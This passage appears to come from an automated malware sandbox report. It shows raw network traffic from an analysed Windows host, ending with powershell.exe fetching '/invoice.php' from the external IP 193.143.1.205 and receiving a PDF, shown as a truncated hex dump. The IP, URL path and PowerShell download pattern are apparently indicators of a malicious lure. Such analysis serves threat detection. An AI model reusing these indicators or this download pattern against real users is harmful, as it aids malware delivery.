                            Jan 15, 2025 10:09:07.079375982 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079389095 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079401016 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079408884 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079413891 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079427958 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079442024 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079469919 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079471111 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079482079 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079494953 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079519987 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079562902 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079575062 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079586029 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079597950 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079608917 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079610109 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079624891 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.079628944 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.079655886 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.114936113 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.114969969 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.114990950 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115004063 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115016937 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115036964 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115052938 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115065098 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115077019 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115089893 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115111113 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115130901 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115144968 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115149975 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115149975 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115149975 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115149975 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115149975 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115149975 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115158081 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115170956 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115184069 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115190983 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115200996 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115221977 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115226984 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115236998 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115241051 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115252972 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115267038 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115278959 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115293026 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115328074 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115340948 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115354061 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115365028 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115386963 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115402937 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115418911 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115469933 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115483046 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115493059 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115520000 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115521908 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115535975 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115547895 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115549088 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115566969 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115580082 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115580082 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115592003 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.115628004 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.115653992 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116132975 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116144896 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116164923 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116178989 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116189957 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116190910 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116225958 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116239071 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116250992 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116262913 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116276979 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116288900 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116303921 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116321087 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116332054 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116349936 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116362095 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116372108 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116374969 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116403103 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116431952 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116445065 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116456032 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116457939 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116468906 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116489887 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116514921 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116523027 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116539001 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116549015 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116563082 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116575956 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116580009 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116611004 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116611958 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116624117 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116636038 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116646051 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116656065 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116676092 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116683960 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116695881 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116707087 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116719007 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116727114 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116743088 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116821051 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116833925 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116847038 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116857052 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.116872072 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.116885900 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.117865086 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117886066 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117897987 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117909908 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117912054 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.117923021 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117933035 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.117937088 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117953062 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117971897 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.117978096 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.117995977 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118004084 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118009090 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118021011 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118032932 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118041039 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118045092 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118058920 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118061066 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118074894 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118086100 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118093967 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118098974 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118112087 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118115902 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118134975 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118144989 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118153095 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118176937 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118180037 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.118189096 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.118218899 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.121500969 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.152874947 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.152899027 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.152910948 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.152923107 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.152936935 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.152950048 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.152964115 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.153085947 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.153085947 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.166884899 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166927099 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166939974 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166950941 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166963100 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166975021 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166986942 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.166987896 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.167012930 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.167032003 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.169882059 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.169941902 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.169955969 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.169965029 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.169981003 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.169981956 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.169997931 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170008898 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170011997 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.170023918 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170043945 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170051098 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.170063019 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170077085 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170089006 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170090914 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.170103073 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170118093 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.170121908 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170135975 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.170152903 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.170176983 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.205533028 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205578089 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205590963 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205602884 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205615044 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205638885 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205651045 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205671072 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205693007 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205692053 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.205708027 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205715895 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.205715895 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.205724001 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205738068 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205744982 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.205753088 CET8049730193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.205774069 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.251219988 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.274185896 CET4973080192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.630512953 CET497318888192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.635467052 CET888849731193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:07.635556936 CET497318888192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.636424065 CET497318888192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:07.641175985 CET888849731193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:08.420476913 CET888849731193.143.1.205192.168.2.4
                            Jan 15, 2025 10:09:08.469985008 CET497318888192.168.2.4193.143.1.205
                            Jan 15, 2025 10:09:08.663997889 CET497318888192.168.2.4193.143.1.205
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 15, 2025 10:09:20.853246927 CET4972253192.168.2.41.1.1.1
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 15, 2025 10:09:20.853246927 CET192.168.2.41.1.1.10x6589Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 15, 2025 10:09:20.469912052 CET1.1.1.1192.168.2.40xb740No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                            Jan 15, 2025 10:09:20.469912052 CET1.1.1.1192.168.2.40xb740No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                            Jan 15, 2025 10:09:20.860479116 CET1.1.1.1192.168.2.40x6589No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                            • 193.143.1.205
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730193.143.1.205807440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            Jan 15, 2025 10:09:05.600069046 CET169OUTGET /invoice.php HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                            Host: 193.143.1.205
                            Connection: Keep-Alive
                            Jan 15, 2025 10:09:06.418787003 CET1236INHTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Wed, 15 Jan 2025 09:09:06 GMT
                            Content-Type: application/pdf
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Frame-Options: SAMEORIGIN
                            Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 [TRUNCATED]
                            Data Ascii: 1f6a%PDF-1.7%1 0 obj<< /Pages 3 0 R /Type /Catalog >>endobj2 0 obj<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>streamx3V0Qw/+Q0TL)VV0Q0PRU,HUHLO-V%0mendstreamendobj4 0 obj<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>endobj5 0 obj<< /Filter /FlateDecode /Length 75 >>streamx3T0B]C aabgiUeE\ E&@yC:lBWB!P9D~K>W &endstreamendobj6 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>endobj7 0 obj<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>streamx+T(O/6PH/*244S0B]HOS04TpBendstreamendobj8 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>endobj9 0 obj<< /BitsPerComponen [TRUNCATED]
                            Jan 15, 2025 10:09:06.418821096 CET224INData Raw: 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 48 65 69 67 68 74 20 33 35 30 34 20 2f 49 6e 74 65 72 70 6f 6c 61 74 65 20 74 72 75 65 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 57 69 64 74 68
                            Data Ascii: /FlateDecode /Height 3504 /Interpolate true /Subtype /Image /Type /XObject /Width 2479 /Length 634286 >>streamxs-oYfQf|H *Q$oeVUC;"/
                            Jan 15, 2025 10:09:06.418833017 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
                            Jan 15, 2025 10:09:06.418844938 CET224INData Raw: 3b 85 a9 6f 3f 00 00 00 00 00 00 00 00 00 1b 34 75 8a c1 d4 ca 25 f4 d1 96 d0 79 06 bd 9d 3d 6e a2 c7 a0 8a ce 93 68 1a 11 a5 87 ee 9e a9 6f 42 00 00 00 00 00 00 00 00 00 1b 31 75 84 c1 d4 6a 4a 68 1a ed 74 19 f4 f1 66 f6 b8 8e 1e 37 8f a9 8a 56
                            Data Ascii: ;o?4u%y=nhoB1ujJhtf7VOY;oE7uGv+j Tg*~*:{oEk6u~%f vA.q<pDtCtC'0`&K]
                            Jan 15, 2025 10:09:06.418867111 CET1236INData Raw: ab ce 09 d5 25 b4 1b 08 ed 33 68 0a a0 17 e7 b3 c7 7d fb 9f cd 23 fd cd 4b 49 a2 fd 88 a8 9d 0f 7d fc 34 ef a1 1c 1e ba 13 a6 be 21 01 00 00 ec 0a be 4c 02 00 00 00 00 e0 cb 30 49 70 c1 6e 28 2d c8 1d 2f a1 6d f1 bc 6f 1a e8 d9 fd b9 7b 48 15 6d
                            Data Ascii: %3h}#KI}4!L0Ipn(-/mo{Hmi?"PoH;2l`rPSB]8s~%~w}rS&WJ|1W{c =*@Og8m|JtConopN01R
                            Jan 15, 2025 10:09:06.418878078 CET1236INData Raw: 00 00 c0 34 f8 62 09 00 00 00 00 80 2f c9 46 63 0a 76 4f e5 81 a1 77 f3 03 43 af 52 0c 3d 6b 0e 0c 3d 39 be 3d 4e 3b 72 f7 d2 8e dc c1 58 e8 cb e7 e7 2f ff 38 7f f1 47 f3 9f 7d 0f 6d ce 0f 4d c3 a1 7b ef ae 3f a4 4d b9 87 b7 27 b2 29 77 f4 d8 d0
                            Data Ascii: 4b/FcvOwCR=k=9=N;rX/8G}mM{?M')wl7'i_X>Ma|h7*roM'7'i_xGG}`<F}cM}?~1=C3`|
                            Jan 15, 2025 10:09:06.418890953 CET1236INData Raw: 17 4b 00 b0 e3 76 ea df 7f 6b 3e 7e 7d f7 dc 68 1b 5d ef a5 d6 7f cc b5 bc 8e 5b bb aa 25 2e 6f 8d 17 b6 ca 5b 71 c5 67 78 c5 0b ab ff 50 f5 ef b1 a5 5f dc 55 ec e0 ab b9 ae 3f da 54 bf ef d2 17 00 00 eb b5 f6 db 1a 76 54 bc 23 57 c5 d0 87 14 43
                            Data Ascii: Kvk>~}h][%.o[qgxP_U?TvT#WCCSb]CU}kch:6=CO%t1?6cC21ASKv_pe-%.u-~mVYO?]=8`6zs(?0&51$
                            Jan 15, 2025 10:09:06.418946981 CET672INData Raw: df 71 fb ff 88 01 f0 15 5a f1 86 8c cf c0 27 13 43 3f 56 c5 d0 ab 3e 86 9e 15 63 e8 db 57 83 e1 50 f3 98 fd fd 37 5d 0c bd 0a 63 e8 49 8a a1 67 f7 12 43 6f 6e 9e e6 c7 86 3e 04 c7 86 12 43 b7 65 ea 9b 13 00 00 c0 34 f8 62 09 00 26 17 de 78 6b 9a
                            Data Ascii: qZ'C?V>cWP7]cIgCon>Ce4b&xkKEK_BXG:a!9KSRDs/rW*UK<Z[axj?P/xy5KoeSco1>'f,*12Cn1KCumg
                            Jan 15, 2025 10:09:06.418960094 CET1236INData Raw: ff 6d 63 e8 87 79 0c 3d 3d e9 62 e8 a5 c4 d0 ee d8 d0 26 86 3e a4 18 6a 8e 0d 6d ff 89 c9 a6 dc 0d 9b fa e6 04 00 00 30 0d be 58 02 80 09 f9 fb 6d f8 2d fa 30 51 3d e4 f7 5b 56 7e a3 7e d1 52 a0 33 41 d8 7d 74 f1 49 71 f3 b2 77 51 27 fd 62 1d 46
                            Data Ascii: mcy==b&>jm0Xm-0Q=[V~~R3A}tIqwQ'bFMs>d,Qlsj>US*r5+'BV`}d9}sWy>YY~n,/bu,;mxP~6/V?RYJmchs`h'Nm--\hc(
                            Jan 15, 2025 10:09:06.418975115 CET1236INData Raw: 3e 29 6b a6 fa b9 d7 7a df 7b e7 a4 bf 9f 7e 59 6a a3 52 45 73 49 34 8c 59 3e 83 16 86 f5 e4 6a 75 a2 3a e8 85 f3 aa e5 cb c8 25 51 53 69 73 13 97 85 ab 2a 8c d0 9a 41 d1 5c a5 35 13 73 66 90 b0 70 79 e6 da ca 97 97 2b 7a b9 82 56 d9 43 2b 4b 68
                            Data Ascii: >)kz{~YjREsI4Y>ju:%QSis*A\5sfpy+zVC+KhXs}}j6AC?P}Cf~<_~GB]N{;|`L80MmbYCn1+=MCWbqC/tP)k6`|o5%47;Vr\&
                            Jan 15, 2025 10:09:06.423820019 CET1236INData Raw: 37 07 77 ce 63 e8 c9 ed 49 13 43 6f 24 86 1e a4 18 2a c3 a1 35 49 f4 7d 57 42 db 1d b9 6d 0c dd b7 31 f4 ec b4 f9 1d 2f e5 d8 d0 9b c7 79 0c e5 d8 d0 69 4c 7d 73 02 00 00 98 06 5f 2c 01 c0 76 98 fb 6a 61 41 6e 79 21 6d ee bc cb d1 63 fe ca 3d 34
